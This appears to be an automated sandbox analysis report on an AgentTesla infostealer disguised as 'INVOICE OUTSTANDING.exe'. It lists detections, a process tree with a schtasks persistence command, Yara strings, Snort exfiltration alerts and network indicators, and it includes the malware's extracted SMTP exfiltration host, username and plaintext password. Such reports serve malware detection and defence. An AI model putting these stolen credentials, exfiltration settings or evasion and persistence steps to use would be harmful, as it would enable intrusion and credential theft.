Windows Analysis Report
INVOICE OUTSTANDING.exe

Overview

General Information

Sample Name: INVOICE OUTSTANDING.exe
Analysis ID: 680571
MD5: 0fa9d94d6393235f67a17b220902dbfa
SHA1: 3c0ae56ab072f622da13806b4336f01f7137ee4c
SHA256: 65ea111f533e1283b202b87434ea207410c1680eadc9b2193c76179eb87decfc
Tags: agenttesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
.NET source code contains very large strings
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • INVOICE OUTSTANDING.exe (PID: 5128 cmdline: "C:\Users\user\Desktop\INVOICE OUTSTANDING.exe" MD5: 0FA9D94D6393235F67A17B220902DBFA)
    • BackgroundTransferHost.exe (PID: 5816 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
    • schtasks.exe (PID: 5816 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 5364 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)
  • kECjS.exe (PID: 5912 cmdline: "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • kECjS.exe (PID: 2756 cmdline: "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"Exfil Mode": "SMTP", "Username": "import@oceanskylogistics.in", "Password": "OcE@n@123$", "Host": "mail.oceanskylogistics.in"}
Yara matches in memory dumps (Source | Rule | Description | Author | Strings)

Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp | Rule: Windows_Trojan_AgentTesla_d3ac2b2f | Description: unknown | Author: unknown
      • 0x97da1:$a13: get_DnsResolver
      • 0xcbbc1:$a13: get_DnsResolver
      • 0x965eb:$a20: get_LastAccessed
      • 0xca40b:$a20: get_LastAccessed
      • 0x98734:$a27: set_InternalServerPort
      • 0xcc554:$a27: set_InternalServerPort
      • 0x98a51:$a30: set_GuidMasterKey
      • 0xcc871:$a30: set_GuidMasterKey
      • 0x966f2:$a33: get_Clipboard
      • 0xca512:$a33: get_Clipboard
      • 0x96700:$a34: get_Keyboard
      • 0xca520:$a34: get_Keyboard
      • 0x979a7:$a35: get_ShiftKeyDown
      • 0xcb7c7:$a35: get_ShiftKeyDown
      • 0x979b8:$a36: get_AltKeyDown
      • 0xcb7d8:$a36: get_AltKeyDown
      • 0x9670d:$a37: get_Password
      • 0xca52d:$a37: get_Password
      • 0x9717d:$a38: get_PasswordHash
      • 0xcaf9d:$a38: get_PasswordHash
      • 0x981ac:$a39: get_DefaultCredentials
Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp | Rule: Windows_Trojan_AgentTesla_e577e17e | Description: unknown | Author: unknown
      • 0x70445:$a: 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07
      • 0xa4265:$a: 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07
Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security

Yara matches in unpacked PEs (Source | Rule | Description | Author | Strings)

Source: 14.0.RegSvcs.exe.400000.0.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 14.0.RegSvcs.exe.400000.0.unpack | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 14.0.RegSvcs.exe.400000.0.unpack | Rule: MALWARE_Win_AgentTeslaV3 | Description: AgentTeslaV3 infostealer payload | Author: ditekSHen
            • 0x324f0:$s10: logins
            • 0x31f4c:$s11: credential
            • 0x2e54a:$g1: get_Clipboard
            • 0x2e558:$g2: get_Keyboard
            • 0x2e565:$g3: get_Password
            • 0x2f7ef:$g4: get_CtrlKeyDown
            • 0x2f7ff:$g5: get_ShiftKeyDown
            • 0x2f810:$g6: get_AltKeyDown
Source: 14.0.RegSvcs.exe.400000.0.unpack | Rule: Windows_Trojan_AgentTesla_d3ac2b2f | Description: unknown | Author: unknown
            • 0x2fbf9:$a13: get_DnsResolver
            • 0x2e443:$a20: get_LastAccessed
            • 0x3058c:$a27: set_InternalServerPort
            • 0x308a9:$a30: set_GuidMasterKey
            • 0x2e54a:$a33: get_Clipboard
            • 0x2e558:$a34: get_Keyboard
            • 0x2f7ff:$a35: get_ShiftKeyDown
            • 0x2f810:$a36: get_AltKeyDown
            • 0x2e565:$a37: get_Password
            • 0x2efd5:$a38: get_PasswordHash
            • 0x30004:$a39: get_DefaultCredentials
Source: 14.0.RegSvcs.exe.400000.0.unpack | Rule: Windows_Trojan_AgentTesla_e577e17e | Description: unknown | Author: unknown
• 0x829d:$a: 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07

No Sigma rule has matched

Snort IDS Alerts

Timestamp: 08/08/22-20:20:11.732977
SID: 2839723
Source IP: 192.168.2.3
Source Port: 49763
Destination IP: 43.255.154.57
Destination Port: 587
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/08/22-20:20:11.733160
SID: 2851779
Source IP: 192.168.2.3
Source Port: 49763
Destination IP: 43.255.154.57
Destination Port: 587
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/08/22-20:20:11.733160
SID: 2840032
Source IP: 192.168.2.3
Source Port: 49763
Destination IP: 43.255.154.57
Destination Port: 587
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 08/08/22-20:20:11.732977
SID: 2030171
Source IP: 192.168.2.3
Source Port: 49763
Destination IP: 43.255.154.57
Destination Port: 587
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: INVOICE OUTSTANDING.exe | ReversingLabs: Detection: 37%
Source: INVOICE OUTSTANDING.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\ahgeNfsrA.exe | Avira: detection malicious, Label: HEUR/AGEN.1235476
Source: C:\Users\user\AppData\Roaming\ahgeNfsrA.exe | ReversingLabs: Detection: 37%
Source: INVOICE OUTSTANDING.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ahgeNfsrA.exe | Joe Sandbox ML: detected
Source: 14.0.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "import@oceanskylogistics.in", "Password": "OcE@n@123$", "Host": "mail.oceanskylogistics.in"}
Source: INVOICE OUTSTANDING.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: INVOICE OUTSTANDING.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.551379171.00000000067DD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000003.378901648.00000000067E7000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr
Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h

Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49763 -> 43.255.154.57:587
Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49763 -> 43.255.154.57:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49763 -> 43.255.154.57:587
Source: Traffic | Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49763 -> 43.255.154.57:587
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View | IP Address: 43.255.154.57
Source: global traffic | TCP traffic: 192.168.2.3:49763 -> 43.255.154.57:587
Source: RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: RegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.oceanskylogistics.in
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334218566.0000000002E75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://wITvjB.com
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.275083576.0000000005DA4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.agfamonotype.
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.264428534.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.263804833.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.264182537.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.264428534.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.263804833.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.264182537.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.comand
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com.C
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.268824829.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268851153.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268730021.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268758763.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268943050.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlM
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.267043053.0000000005D98000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/pC
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comF
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.coma
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comaCC
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comalicCC
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comalsd
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comcom/pC
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.come.com
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comessed
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comueed
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258155841.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.comic
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258239730.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.comn
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.comn-u
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.261782172.0000000005D94000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cr%X
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnl
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnl-s
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnr-f
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.274775393.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.273884816.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274864897.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274960497.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.275003587.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.microft.c
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.274775393.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274864897.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.monotype.K
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258362405.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257901573.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257875244.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258530065.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.257901573.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258048117.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257978730.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257944160.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258298723.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258070392.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257875244.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.comdif
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kre
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258837182.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258983594.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258921299.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.258837182.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.comlic
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.de
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: RegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://Vvf6edm0NHgn8Mct.com
Source: RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | DNS traffic detected: queries for: mail.oceanskylogistics.in

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File written: C:\Windows\System32\drivers\etc\hosts

            System Summary

            barindex
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
